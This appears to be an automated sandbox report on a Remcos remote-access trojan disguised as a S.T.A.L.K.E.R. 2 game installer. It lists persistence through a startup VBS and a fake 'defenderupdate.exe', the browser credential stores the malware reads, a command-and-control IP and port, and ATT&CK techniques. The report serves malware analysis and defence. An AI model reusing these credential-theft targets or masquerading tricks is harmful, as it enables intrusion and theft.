                  Source: Yara matchFile source: 00000004.00000002.3538658538.00000000011D7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.2183906073.0000000004643000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1871058602.0000000003FC6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: eBHn6qHPLz.exe PID: 7336, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: eBHn6qHPLz.exe PID: 7612, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: defenderupdate.exe PID: 7944, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: defenderupdate.exe PID: 8040, type: MEMORYSTR
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data9_2_0040B21B
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\9_2_0040B335
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: \key3.db9_2_0040B335

                  Remote Access Functionality

                  barindex
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-JVWXPCJump to behavior
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-JVWXPCJump to behavior
                  Source: Yara matchFile source: 0.2.eBHn6qHPLz.exe.45d4110.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.defenderupdate.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.eBHn6qHPLz.exe.45d4110.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.defenderupdate.exe.4685cf8.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.defenderupdate.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.defenderupdate.exe.4685cf8.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.eBHn6qHPLz.exe.4251578.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000004.00000002.3538658538.00000000011EA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.2166640000.0000000000D67000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1871058602.00000000046AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.3538658538.00000000011D7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.2183906073.0000000004643000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1871058602.0000000003FC6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: eBHn6qHPLz.exe PID: 7336, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: eBHn6qHPLz.exe PID: 7612, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: defenderupdate.exe PID: 7944, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: defenderupdate.exe PID: 8040, type: MEMORYSTR
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: cmd.exe9_2_00405042
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information111
                  Scripting
                  Valid Accounts1
                  Native API
                  111
                  Scripting
                  1
                  DLL Side-Loading
                  1
                  Disable or Modify Tools
                  1
                  OS Credential Dumping
                  2
                  System Time Discovery
                  Remote Services12
                  Archive Collected Data
                  12
                  Ingress Tool Transfer
                  Exfiltration Over Other Network Medium1
                  System Shutdown/Reboot
                  CredentialsDomainsDefault Accounts1
                  Command and Scripting Interpreter
                  1
                  DLL Side-Loading
                  1
                  Bypass User Account Control
                  11
                  Deobfuscate/Decode Files or Information
                  111
                  Input Capture
                  1
                  Account Discovery
                  Remote Desktop Protocol111
                  Input Capture
                  2
                  Encrypted Channel
                  Exfiltration Over Bluetooth1
                  Defacement
                  Email AddressesDNS ServerDomain Accounts2
                  Service Execution
                  1
                  Windows Service
                  1
                  Access Token Manipulation
                  31
                  Obfuscated Files or Information
                  2
                  Credentials In Files
                  1
                  System Service Discovery
                  SMB/Windows Admin Shares3
                  Clipboard Data
                  1
                  Non-Standard Port
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCron2
                  Registry Run Keys / Startup Folder
                  1
                  Windows Service
                  11
                  Software Packing
                  NTDS3
                  File and Directory Discovery
                  Distributed Component Object ModelInput Capture1
                  Remote Access Software
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script121
                  Process Injection
                  1
                  DLL Side-Loading
                  LSA Secrets43
                  System Information Discovery
                  SSHKeylogging2
                  Non-Application Layer Protocol
                  Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts2
                  Registry Run Keys / Startup Folder
                  1
                  Bypass User Account Control
                  Cached Domain Credentials221
                  Security Software Discovery
                  VNCGUI Input Capture12
                  Application Layer Protocol
                  Data Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                  Masquerading
                  DCSync2
                  Virtualization/Sandbox Evasion
                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
                  Virtualization/Sandbox Evasion
                  Proc Filesystem2
                  Process Discovery
                  Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                  Access Token Manipulation
                  /etc/passwd and /etc/shadow3
                  System Owner/User Discovery
                  Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron121
                  Process Injection
                  Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1562024 Sample: eBHn6qHPLz.exe Startdate: 25/11/2024 Architecture: WINDOWS Score: 100 45 geoplugin.net 2->45 47 Suricata IDS alerts for network traffic 2->47 49 Found malware configuration 2->49 51 Malicious sample detected (through community Yara rule) 2->51 53 12 other signatures 2->53 8 wscript.exe 1 2->8         started        11 eBHn6qHPLz.exe 7 2->11         started        signatures3 process4 file5 57 Windows Scripting host queries suspicious COM object (likely to drop second stage) 8->57 14 defenderupdate.exe 2 8->14         started        33 C:\Users\user\AppData\...\defenderupdate.exe, PE32 11->33 dropped 35 setup_s.t.a.l.k.e....byl_436_(77912).exe, PE32 11->35 dropped 37 C:\...\defenderupdate.exe:Zone.Identifier, ASCII 11->37 dropped 39 C:\Users\user\AppData\...\defenderupdate.vbs, ASCII 11->39 dropped 59 Drops VBS files to the startup folder 11->59 61 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 11->61 63 Injects a PE file into a foreign processes 11->63 17 eBHn6qHPLz.exe 3 13 11->17         started        20 setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).exe 2 11->20         started        signatures6 process7 dnsIp8 65 Multi AV Scanner detection for dropped file 14->65 67 Contains functionality to bypass UAC (CMSTPLUA) 14->67 69 Contains functionalty to change the wallpaper 14->69 73 6 other signatures 14->73 23 defenderupdate.exe 14->23         started        41 5.181.159.153, 1151, 49732 MIVOCLOUDMD Moldova Republic of 17->41 43 geoplugin.net 178.237.33.50, 49735, 80 ATOM86-ASATOM86NL Netherlands 17->43 71 Detected Remcos RAT 17->71 29 setup_s.t.a.l.k.e....byl_436_(77912).tmp, PE32 20->29 dropped 26 setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmp 3 12 20->26         started        file9 signatures10 process11 file12 55 Detected Remcos RAT 23->55 31 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 26->31 dropped signatures13

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  eBHn6qHPLz.exe61%ReversingLabsByteCode-MSIL.Trojan.Generic
                  eBHn6qHPLz.exe58%VirustotalBrowse
                  eBHn6qHPLz.exe100%Joe Sandbox ML
                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Roaming\defenderupdate.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Temp\is-252SN.tmp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmp4%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\is-252SN.tmp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmp0%VirustotalBrowse
                  C:\Users\user\AppData\Local\Temp\is-MG2J6.tmp\_isetup\_setup64.tmp0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\is-MG2J6.tmp\_isetup\_setup64.tmp0%VirustotalBrowse
                  C:\Users\user\AppData\Local\Temp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).exe0%ReversingLabs
                  C:\Users\user\AppData\Roaming\defenderupdate.exe61%ReversingLabsByteCode-MSIL.Trojan.Generic
                  No Antivirus matches
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  http://www.gog.com$http://www.gog.com$http://www.gog.com.436.0%Avira URL Cloudsafe
                  http://www.gog.com030%Avira URL Cloudsafe
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  geoplugin.net
                  178.237.33.50
                  truefalse
                    high
                    NameMaliciousAntivirus DetectionReputation
                    http://geoplugin.net/json.gpfalse
                      high
                      NameSourceMaliciousAntivirus DetectionReputation
                      http://www.innosetup.com/setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).exe, 00000002.00000003.1853902213.000000007F6D0000.00000004.00001000.00020000.00000000.sdmp, setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).exe, 00000002.00000003.1853202895.0000000002CC0000.00000004.00001000.00020000.00000000.sdmp, setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmp, 00000003.00000000.1854814903.0000000000E01000.00000020.00000001.01000000.00000008.sdmp, setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmp.2.drfalse
                        high
                        https://www.gog.com/galaxysetup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).exe, 00000002.00000002.3540772142.000000007F820000.00000004.00001000.00020000.00000000.sdmp, setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).exe, 00000002.00000003.1851801236.0000000002B80000.00000004.00001000.00020000.00000000.sdmpfalse
                          high
                          http://geoplugin.net/json.gpheBHn6qHPLz.exe, 00000004.00000002.3538658538.000000000122B000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            https://sectigo.com/CPS0eBHn6qHPLz.exe, 00000000.00000002.1871058602.0000000003FC6000.00000004.00000800.00020000.00000000.sdmp, setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).exe.0.drfalse
                              high
                              http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#eBHn6qHPLz.exe, 00000000.00000002.1871058602.0000000003FC6000.00000004.00000800.00020000.00000000.sdmp, setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).exe.0.drfalse
                                high
                                https://stackoverflow.com/q/14436606/23354eBHn6qHPLz.exe, 00000000.00000002.1891174679.0000000006410000.00000004.08000000.00040000.00000000.sdmp, eBHn6qHPLz.exe, 00000000.00000002.1859614323.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, defenderupdate.exe, 00000008.00000002.2168900167.00000000032F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://github.com/mgravell/protobuf-netJeBHn6qHPLz.exe, 00000000.00000002.1891174679.0000000006410000.00000004.08000000.00040000.00000000.sdmpfalse
                                    high
                                    http://geoplugin.net/json.gpeeBHn6qHPLz.exe, 00000004.00000002.3538658538.00000000011EA000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      http://ocsp.sectigo.com0eBHn6qHPLz.exe, 00000000.00000002.1871058602.0000000003FC6000.00000004.00000800.00020000.00000000.sdmp, setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).exe.0.drfalse
                                        high
                                        http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupUeBHn6qHPLz.exe, 00000000.00000002.1871058602.0000000003F99000.00000004.00000800.00020000.00000000.sdmp, setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).exe, 00000002.00000000.1851295333.00000000006F1000.00000020.00000001.01000000.00000007.sdmp, setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).exe.0.drfalse
                                          high
                                          https://github.com/mgravell/protobuf-neteBHn6qHPLz.exe, 00000000.00000002.1891174679.0000000006410000.00000004.08000000.00040000.00000000.sdmpfalse
                                            high
                                            http://geoplugin.net/json.gpxeBHn6qHPLz.exe, 00000004.00000002.3538658538.00000000011D7000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              http://geoplugin.net/json.gpl5m8eBHn6qHPLz.exe, 00000004.00000002.3538658538.000000000122B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                http://www.dk-soft.org/setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).exe, 00000002.00000002.3538258325.000000000299A000.00000004.00001000.00020000.00000000.sdmp, setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).exe, 00000002.00000003.1851801236.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmp, 00000003.00000002.3540778391.000000000278B000.00000004.00001000.00020000.00000000.sdmpfalse
                                                  high
                                                  http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0eBHn6qHPLz.exe, 00000000.00000002.1871058602.0000000003FC6000.00000004.00000800.00020000.00000000.sdmp, setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).exe.0.drfalse
                                                    high
                                                    https://github.com/mgravell/protobuf-netieBHn6qHPLz.exe, 00000000.00000002.1891174679.0000000006410000.00000004.08000000.00040000.00000000.sdmpfalse
                                                      high
                                                      http://geoplugin.net/eBHn6qHPLz.exe, 00000004.00000002.3538658538.000000000122B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        http://geoplugin.net/json.gpEeBHn6qHPLz.exe, 00000004.00000002.3538658538.00000000011D7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          http://geoplugin.net/json.gp/CeBHn6qHPLz.exe, 00000000.00000002.1871058602.00000000046AE000.00000004.00000800.00020000.00000000.sdmp, eBHn6qHPLz.exe, 00000000.00000002.1871058602.0000000003FC6000.00000004.00000800.00020000.00000000.sdmp, defenderupdate.exe, 00000008.00000002.2183906073.0000000004643000.00000004.00000800.00020000.00000000.sdmp, defenderupdate.exe, 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                            high
                                                            https://stackoverflow.com/q/11564914/23354;eBHn6qHPLz.exe, 00000000.00000002.1891174679.0000000006410000.00000004.08000000.00040000.00000000.sdmpfalse
                                                              high
                                                              https://stackoverflow.com/q/2152978/23354eBHn6qHPLz.exe, 00000000.00000002.1891174679.0000000006410000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                high
                                                                http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0zeBHn6qHPLz.exe, 00000000.00000002.1871058602.0000000003FC6000.00000004.00000800.00020000.00000000.sdmp, setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).exe.0.drfalse
                                                                  high
                                                                  http://geoplugin.net/json.gpOeBHn6qHPLz.exe, 00000004.00000002.3538658538.000000000122B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://www.gog.com$http://www.gog.com$http://www.gog.com.436.setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).exe, 00000002.00000003.1851801236.0000000002B80000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://geoplugin.net/json.gpTeBHn6qHPLz.exe, 00000004.00000002.3538658538.00000000011D7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://www.gog.com03setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).exe, 00000002.00000002.3538258325.0000000002A23000.00000004.00001000.00020000.00000000.sdmp, setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmp, 00000003.00000002.3540778391.0000000002853000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://www.remobjects.com/pssetup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).exe, 00000002.00000003.1853902213.000000007F6D0000.00000004.00001000.00020000.00000000.sdmp, setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).exe, 00000002.00000003.1853202895.0000000002CC0000.00000004.00001000.00020000.00000000.sdmp, setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmp, 00000003.00000000.1854814903.0000000000E01000.00000020.00000001.01000000.00000008.sdmp, setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmp.2.drfalse
                                                                        high
                                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameeBHn6qHPLz.exe, 00000000.00000002.1859614323.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, defenderupdate.exe, 00000008.00000002.2168900167.00000000032F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#eBHn6qHPLz.exe, 00000000.00000002.1871058602.0000000003FC6000.00000004.00000800.00020000.00000000.sdmp, setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).exe.0.drfalse
                                                                            high
                                                                            • No. of IPs < 25%
                                                                            • 25% < No. of IPs < 50%
                                                                            • 50% < No. of IPs < 75%
                                                                            • 75% < No. of IPs
                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                            5.181.159.153
                                                                            unknownMoldova Republic of
                                                                            39798MIVOCLOUDMDtrue
                                                                            178.237.33.50
                                                                            geoplugin.netNetherlands
                                                                            8455ATOM86-ASATOM86NLfalse
                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                            Analysis ID:1562024
                                                                            Start date and time:2024-11-25 04:46:20 +01:00
                                                                            Joe Sandbox product:CloudBasic
                                                                            Overall analysis duration:0h 8m 55s
                                                                            Hypervisor based Inspection enabled:false
                                                                            Report type:full
                                                                            Cookbook file name:default.jbs
                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                            Run name:Run with higher sleep bypass
                                                                            Number of analysed new started processes analysed:11
                                                                            Number of new started drivers analysed:0
                                                                            Number of existing processes analysed:0
                                                                            Number of existing drivers analysed:0
                                                                            Number of injected processes analysed:0
                                                                            Technologies:
                                                                            • HCA enabled
                                                                            • EGA enabled
                                                                            • AMSI enabled
                                                                            Analysis Mode:default
                                                                            Analysis stop reason:Timeout
                                                                            Sample name:eBHn6qHPLz.exe
                                                                            renamed because original name is a hash value
                                                                            Original Sample Name:12f35a41245c2dbb16d0574d9dcc59c9.exe
                                                                            Detection:MAL
                                                                            Classification:mal100.rans.troj.spyw.expl.evad.winEXE@12/8@2/2
                                                                            EGA Information:
                                                                            • Successful, ratio: 100%
                                                                            HCA Information:
                                                                            • Successful, ratio: 89%
                                                                            • Number of executed functions: 319
                                                                            • Number of non-executed functions: 168
                                                                            Cookbook Comments:
                                                                            • Found application associated with file extension: .exe
                                                                            • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                            • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                            TimeTypeDescription
                                                                            03:47:28AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\defenderupdate.vbs
                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            178.237.33.50mCtN05kxh6.exeGet hashmaliciousRemcosBrowse
                                                                            • geoplugin.net/json.gp
                                                                            Bank Fund Transfer-589237.scr.exeGet hashmaliciousRemcosBrowse
                                                                            • geoplugin.net/json.gp
                                                                            Payment Transfer Request Form.bat.exeGet hashmaliciousRemcosBrowse
                                                                            • geoplugin.net/json.gp
                                                                            CargoInvoice_Outstanding_56789_2024-11-21.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                            • geoplugin.net/json.gp
                                                                            payment receipt copy.bat.exeGet hashmaliciousRemcosBrowse
                                                                            • geoplugin.net/json.gp
                                                                            1732341066786265aade6e9541774ff20509504237780da7874a65dc23bf44c6634c553abe427.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                            • geoplugin.net/json.gp
                                                                            17323410671691fb610332a2a23e84df9d573b6d7d338d6835a49e8e0241717de8180586cb855.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                            • geoplugin.net/json.gp
                                                                            17323144242c7236b99d23fa10a9292bd7fb1c1fb47a26f3a8dc1daae9ecf25bbc7e35eb77810.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                            • geoplugin.net/json.gp
                                                                            018292540-LetterReguranPPI-20230814215304.PDF.exeGet hashmaliciousRemcosBrowse
                                                                            • geoplugin.net/json.gp
                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            geoplugin.netmCtN05kxh6.exeGet hashmaliciousRemcosBrowse
                                                                            • 178.237.33.50
                                                                            Bank Fund Transfer-589237.scr.exeGet hashmaliciousRemcosBrowse
                                                                            • 178.237.33.50
                                                                            Payment Transfer Request Form.bat.exeGet hashmaliciousRemcosBrowse
                                                                            • 178.237.33.50
                                                                            CargoInvoice_Outstanding_56789_2024-11-21.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                            • 178.237.33.50
                                                                            payment receipt copy.bat.exeGet hashmaliciousRemcosBrowse
                                                                            • 178.237.33.50
                                                                            1732341066786265aade6e9541774ff20509504237780da7874a65dc23bf44c6634c553abe427.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                            • 178.237.33.50
                                                                            17323410671691fb610332a2a23e84df9d573b6d7d338d6835a49e8e0241717de8180586cb855.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                            • 178.237.33.50
                                                                            17323144242c7236b99d23fa10a9292bd7fb1c1fb47a26f3a8dc1daae9ecf25bbc7e35eb77810.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                            • 178.237.33.50
                                                                            018292540-LetterReguranPPI-20230814215304.PDF.exeGet hashmaliciousRemcosBrowse
                                                                            • 178.237.33.50
                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            MIVOCLOUDMDI2BJhmJou4.exeGet hashmaliciousLummaC StealerBrowse
                                                                            • 94.158.244.69
                                                                            I5jG2Os8GA.exeGet hashmaliciousLummaC StealerBrowse
                                                                            • 94.158.244.69
                                                                            OlZzqwjrwO.exeGet hashmaliciousLummaC StealerBrowse
                                                                            • 94.158.244.69
                                                                            Vd3tOP5WSD.exeGet hashmaliciousLummaC StealerBrowse
                                                                            • 94.158.244.69
                                                                            g1kWKm20Z5.exeGet hashmaliciousLummaC StealerBrowse
                                                                            • 94.158.244.69
                                                                            cgln32y2HF.exeGet hashmaliciousLummaC StealerBrowse
                                                                            • 94.158.244.69
                                                                            4Oq9i3gm0g.exeGet hashmaliciousLummaC StealerBrowse
                                                                            • 94.158.244.69
                                                                            RX7nieXlNm.exeGet hashmaliciousLummaC StealerBrowse
                                                                            • 94.158.244.69
                                                                            5M5e9srxkE.exeGet hashmaliciousLummaC StealerBrowse
                                                                            • 94.158.244.69
                                                                            ATOM86-ASATOM86NLmCtN05kxh6.exeGet hashmaliciousRemcosBrowse
                                                                            • 178.237.33.50
                                                                            Bank Fund Transfer-589237.scr.exeGet hashmaliciousRemcosBrowse
                                                                            • 178.237.33.50
                                                                            Payment Transfer Request Form.bat.exeGet hashmaliciousRemcosBrowse
                                                                            • 178.237.33.50
                                                                            CargoInvoice_Outstanding_56789_2024-11-21.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                            • 178.237.33.50
                                                                            payment receipt copy.bat.exeGet hashmaliciousRemcosBrowse
                                                                            • 178.237.33.50
                                                                            1732341066786265aade6e9541774ff20509504237780da7874a65dc23bf44c6634c553abe427.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                            • 178.237.33.50
                                                                            17323410671691fb610332a2a23e84df9d573b6d7d338d6835a49e8e0241717de8180586cb855.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                            • 178.237.33.50
                                                                            17323144242c7236b99d23fa10a9292bd7fb1c1fb47a26f3a8dc1daae9ecf25bbc7e35eb77810.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                            • 178.237.33.50
                                                                            018292540-LetterReguranPPI-20230814215304.PDF.exeGet hashmaliciousRemcosBrowse
                                                                            • 178.237.33.50
                                                                            No context
                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            C:\Users\user\AppData\Local\Temp\is-MG2J6.tmp\_isetup\_setup64.tmp2024.1.16.exeGet hashmaliciousUnknownBrowse
                                                                              2024.1.16.exeGet hashmaliciousUnknownBrowse
                                                                                veraport-g3-x64.exeGet hashmaliciousUnknownBrowse
                                                                                  ChromeSetup.exeGet hashmaliciousSpark RATBrowse
                                                                                    ChromeSetup.exeGet hashmaliciousSpark RATBrowse
                                                                                      file.exeGet hashmaliciousAmadeyBrowse
                                                                                        Y7Zv23yKfb.exeGet hashmaliciousMicroClipBrowse
                                                                                          Y7Zv23yKfb.exeGet hashmaliciousMicroClipBrowse
                                                                                            cho_mea64.exeGet hashmaliciousMicroClipBrowse
                                                                                              Process:C:\Users\user\Desktop\eBHn6qHPLz.exe
                                                                                              File Type:JSON data
                                                                                              Category:dropped
                                                                                              Size (bytes):962
                                                                                              Entropy (8bit):5.01442467270497
                                                                                              Encrypted:false
                                                                                              SSDEEP:12:tkluQ+nd6UGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkwV:qluQydVauKyGX85jvXhNlT3/7AcV9Wro
                                                                                              MD5:4A8FAD17775993221C3AD2D68BB4B306
                                                                                              SHA1:DB42C3975A64E7B4CE2A93FF5AF91F2DF73C82BD
                                                                                              SHA-256:893F1B254D4EC2484868976F1B62D5A064909EA08E46F95193DBE79DB435E604
                                                                                              SHA-512:63252CFDC2CC7A32F86D9CB5D27E1695A8C138EBFBF476741C017EB349F20BDC72FF5856E0044DB189BAABDB1C3819C29FFC33A054810BD0354726300063D52C
                                                                                              Malicious:false
                                                                                              Reputation:low
